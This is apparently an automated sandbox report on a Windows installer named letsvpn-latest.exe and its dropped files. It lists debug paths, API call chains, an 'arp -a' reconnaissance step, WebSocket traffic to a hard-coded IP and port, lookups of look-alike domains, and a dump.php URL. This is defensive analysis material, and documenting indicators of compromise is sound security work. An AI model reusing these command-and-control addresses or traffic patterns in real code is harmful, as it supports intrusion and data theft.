              Source: Binary string: c:\users\samuli\opt\tap-windows6-mattock\tapinstall\7600\objfre_wlh_amd64\amd64\tapinstall.pdbH source: letsvpn-latest.exe, 00000015.00000003.2343440386.000000000310D000.00000004.00000020.00020000.00000000.sdmp, tapinstall.exe, 00000021.00000000.2603866703.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000021.00000002.2606131178.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000000.2607796952.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000023.00000002.2660016264.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000000.2665972836.00007FF796191000.00000020.00000001.01000000.00000017.sdmp, tapinstall.exe, 00000029.00000002.2668002400.00007FF796191000.00000020.00000001.01000000.00000017.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.Requests\4.0.11.0\System.Net.Requests.pdb source: letsvpn-latest.exe, 00000015.00000003.2452215583.000000000310D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.IO.Compression/netfx\System.IO.Compression.pdb]W source: letsvpn-latest.exe, 00000015.00000003.2426450844.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/Microsoft.Win32.SystemEvents/net461-Release/Microsoft.Win32.SystemEvents.pdb source: letsvpn-latest.exe, 00000015.00000003.2376355832.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Extensions\4.1.2.0\System.Runtime.Extensions.pdb source: letsvpn-latest.exe, 00000015.00000003.2463704916.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/Windows_NT.AnyCPU.Release/System.Net.Sockets/netfx\System.Net.Sockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2453530539.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Collections\4.0.11.0\System.Collections.pdb source: letsvpn-latest.exe, 00000015.00000003.2398236397.0000000003109000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Net.WebSockets\4.0.2.0\System.Net.WebSockets.pdb source: letsvpn-latest.exe, 00000015.00000003.2455726262.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/Microsoft.Toolkit.Uwp.Notifications/obj/Release/net461/Microsoft.Toolkit.Uwp.Notifications.pdbSHA256 source: letsvpn-latest.exe, 00000015.00000003.2371393124.000000000310F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\1795\s\corefx\bin/obj/AnyOS.AnyCPU.Release/System.Diagnostics.StackTrace/netfx\System.Diagnostics.StackTrace.pdb$.>. 0._CorDllMainmscoree.dll source: letsvpn-latest.exe, 00000015.00000003.2413846531.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: letsvpn-latest.exe, 00000015.00000003.2467599603.0000000003101000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.IO.MemoryMappedFiles\4.0.2.0\System.IO.MemoryMappedFiles.pdb source: letsvpn-latest.exe, 00000015.00000003.2431492530.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\A\_work\582\s\bin\obj\ref\System.Globalization.Calendars\4.0.3.0\System.Globalization.Calendars.pdb source: letsvpn-latest.exe, 00000015.00000003.2423705270.000000000310C000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.ServiceModel.Security.Facade/Release/net461/System.ServiceModel.Security.pdb source: letsvpn-latest.exe, 00000015.00000003.2487551781.0000000003103000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: /_/artifacts/obj/System.Diagnostics.EventLog/net461-Release/System.Diagnostics.EventLog.pdb source: letsvpn-latest.exe, 00000015.00000003.2410824087.0000000003102000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: D:\a\1\s\SDK\AppCenter\Microsoft.AppCenter.WindowsDesktop\obj\Release\net461\Microsoft.AppCenter.pdbSHA256X7 source: letsvpn-latest.exe, 00000015.00000003.2369093669.000000000310B000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FEB97
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,19_2_6D0FC41C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FE748
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,19_2_6D0FC385
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D095C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,19_2_6D095C91
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDCF7
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDF35
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FD86F
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDA9B
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_0040689E FindFirstFileW,FindClose,21_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00402930 FindFirstFileW,21_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961971EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,33_2_00007FF7961971EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00684318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,58_2_00684318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00695490 FindFirstFileExW,58_2_00695490

              Networking

              Source: global trafficTCP traffic: 8.217.212.245 ports 1,2,15628,5,6,8
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49886 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50033 -> 15628
              Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 15628
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\app-3.12.0\netstandard.dll, type: DROPPED
              Source: Yara matchFile source: C:\Program Files (x86)\letsvpn\Update.exe, type: DROPPED
              Source: global trafficTCP traffic: 192.168.2.6:49730 -> 8.217.212.245:15628
              Source: global trafficTCP traffic: 192.168.2.6:49866 -> 8.8.8.8:53
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EAIFCJJtIpBBrGEUCHJJUtCpESec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: hgEoGyIHHcKxHmeBCkGUPHIERSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: EHDtHuIBUdDVfHXhrVyFEUGzFSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: COcjDJHEDQoOInBCDDGFarHDUSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: qphGfKuJZRHBtITmGBcfpvVDUSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: UqeIpIqArHhSexIQlmFYlJBoGSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: DXBHDqPpLFlTgCIrHHBxEKHKPSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: hyKyGMDiwJKCSQjDasFQwJaKHSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /app/4fc436ef36f4026102d7?protocol=5&client=pusher-dotnet-client&version=1.1.2 HTTP/1.1Host: ws-ap1.pusher.comUpgrade: websocketConnection: UpgradeSec-WebSocket-Version: 13Sec-WebSocket-Key: ZmQxOTJiYTctZGRlMS00Zg==Origin: ws://ws-ap1.pusher.com
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: WfxndBCwxGPkHVEIkfBOKFtISSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: CGuKfKJpiJIQgrIIGFFIHJHHJSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: yhrCHtBBGdQDZCyKHJjbdBnHKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: FoPFDZlWHBTCtkBnNJIzYtBHVSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: BKUcFWzXCrUNNGuBHHCSIyZHKSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: oqRHpJDqHRNDHUVBBFHIccFjWSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: WwPxFgueJfqDBCQDPnCJYZTEBSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: KdIFBVttISDfKflFDZBItwEBsSec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: global trafficHTTP traffic detected: GET /\ HTTP/1.1Connection: UpgradeSec-WebSocket-Key: iDHKdRHDOTuLoEMRwtCCiifOESec-WebSocket-Version: 13Upgrade: websocketSec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsHost: 8.217.212.245:15628
              Source: Joe Sandbox ViewIP Address: 183.60.146.66 183.60.146.66
              Source: Joe Sandbox ViewIP Address: 103.235.46.96 103.235.46.96
              Source: unknownTCP traffic detected without corresponding DNS query: 8.217.212.245
              Source: unknownTCP traffic detected without corresponding DNS query: 23.98.101.155
              Source: unknownTCP traffic detected without corresponding DNS query: 8.223.59.119
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00513040 ?SysNativeMBToWide@base@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@ABV?$BasicStringPiece@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@1@@Z,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetCurrentThreadId,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,InternetOpenW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$ba
sic_iostream@DU?$char_traits@D@std@@@std@@UAE@XZ,??1?$basic_ios@_WU?$char_traits@_W@std@@@std@@UAE@XZ,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE@XZ,GetTickCount,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@J@Z,GetCurrentThreadId,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@I@Z,??6@YAAAV?$basic_ostream@DU?$char_traits@D@std@@@std@@AAV01@PB_W@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PBX@Z,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,OutputDebugStringA,??3@YAXPAX@Z,HttpOpenRequestW,??0exception@std@@QAE@ABQBD@Z,_CxxThrowException,??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ,??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z,??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAE19_2_00513040
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nal.fqoqehwib.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=chr.alipayassets.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global trafficHTTP traffic detected: GET /rest-api?edns_client_subnet=0.0.0.0%2F0&name=nit.crash1ytics.com.&type=1 HTTP/1.1Host: d1dmgcawtbm6l9.cloudfront.netUser-Agent: Go-http-client/1.1Accept-Encoding: gzip
              Source: global traffic | DNS traffic detected: DNS query: ws-ap1.pusher.com
              Source: global traffic | DNS traffic detected: DNS query: www.yandex.com
              Source: global traffic | DNS traffic detected: DNS query: www.google.com
              Source: global traffic | DNS traffic detected: DNS query: www.baidu.com
              Source: global traffic | DNS traffic detected: DNS query: in.appcenter.ms
              Source: global traffic | DNS traffic detected: DNS query: nal.fqoqehwib.com
              Source: global traffic | DNS traffic detected: DNS query: chr.alipayassets.com
              Source: global traffic | DNS traffic detected: DNS query: d1dmgcawtbm6l9.cloudfront.net
              Source: global traffic | DNS traffic detected: DNS query: nit.crash1ytics.com
              Source: sinaplayer_service.exe, sinaplayer_service.exe, 00000013.00000000.2209995817.000000000053D000.00000002.00000001.01000000.0000000B.sdmp, sinaplayer_service.exe, 00000013.00000002.3388043166.000000000053D000.00000002.00000001.01000000.0000000B.sdmp | String found in binary or memory: http://125.211.213.34/dump.php
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0Jurn:oasis:names:tc:SAML:1.0
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
              Source: letsvpn-latest.exe, 00000015.00000003.2529981181.0000000003109000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
              Source: svchost.exe, 0000000D.00000003.2167055659.0000020B58350000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
              Source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/
              Source: letsvpn-latest.exe, 00000015.00000003.2350184994.0000000003107000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fontawesome.iohttp://fontawesome.io/license/Copyright
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/AppMenuDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ButtonDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/RadioButtonDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/ScrollViewDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TabControllerDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/TextBoxDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/Themes/WindowDictionary.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xaml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/app.xamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/app.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/appmenudictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/buttondictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/radiobuttondictionary.bamld
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.baml
              Source: LetsPRO.exe, 0000003B.00000002.2708054406.0000000002D84000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://foo/bar/themes/scrollviewdictionary.bamld
